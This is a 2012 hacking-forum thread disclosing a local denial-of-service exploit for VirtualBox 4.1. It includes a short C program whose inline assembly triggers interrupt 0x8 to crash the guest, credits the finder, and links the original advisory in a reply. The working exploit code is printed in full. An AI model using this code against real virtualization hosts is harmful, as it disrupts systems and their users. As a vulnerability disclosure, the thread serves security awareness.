Author Topic: VirtualBox exploit [DoS]  (Read 941 times)

0 Members and 1 Guest are viewing this topic.

Offline Daemon

  • VIP
  • Baron
  • *
  • Posts: 845
  • Cookies: 153
  • A wise man fears a gentle mans anger
    • View Profile
VirtualBox exploit [DoS]
« on: September 11, 2012, 08:32:47 am »
Word of caution to all you Oracle VB users out there, an exploit has been found in VB v. 4.1 that allows a local DoS attack. High risk? Not unless you have a lot of people with physical access to your network who hate you. But is it interesting? Oh yes! Let's take a look at it...

Code: [Select]
int main(int argc, char **argv)
{  asm (   
    "int $0x8;"   
    : // output: none   
    : // input: none   
    :"%eax", "%ebx", "%ecx", "%edx"   // clobbered register 
    );
 return(0);
}

All credit for this discovery goes to halfdog, whoever that may be :) This is dated today btw, so cheers on the new exploit 
« Last Edit: September 11, 2012, 11:48:18 am by ande »
This lifestyle is strictly DIY or GTFO - lucid

Because sexploits are for h0edays - noncetonic


Xires burns the souls of HF skids as a power supply

Offline ca0s

  • VIP
  • Sir
  • *
  • Posts: 432
  • Cookies: 53
    • View Profile
    • ka0labs #
Re: VirtualBox exploit [DoS]
« Reply #1 on: September 11, 2012, 03:50:42 pm »
Code: [Select]
http://www.halfdog.net/Security/2012/VirtualBoxSoftwareInterrupt0x8GuestCrash/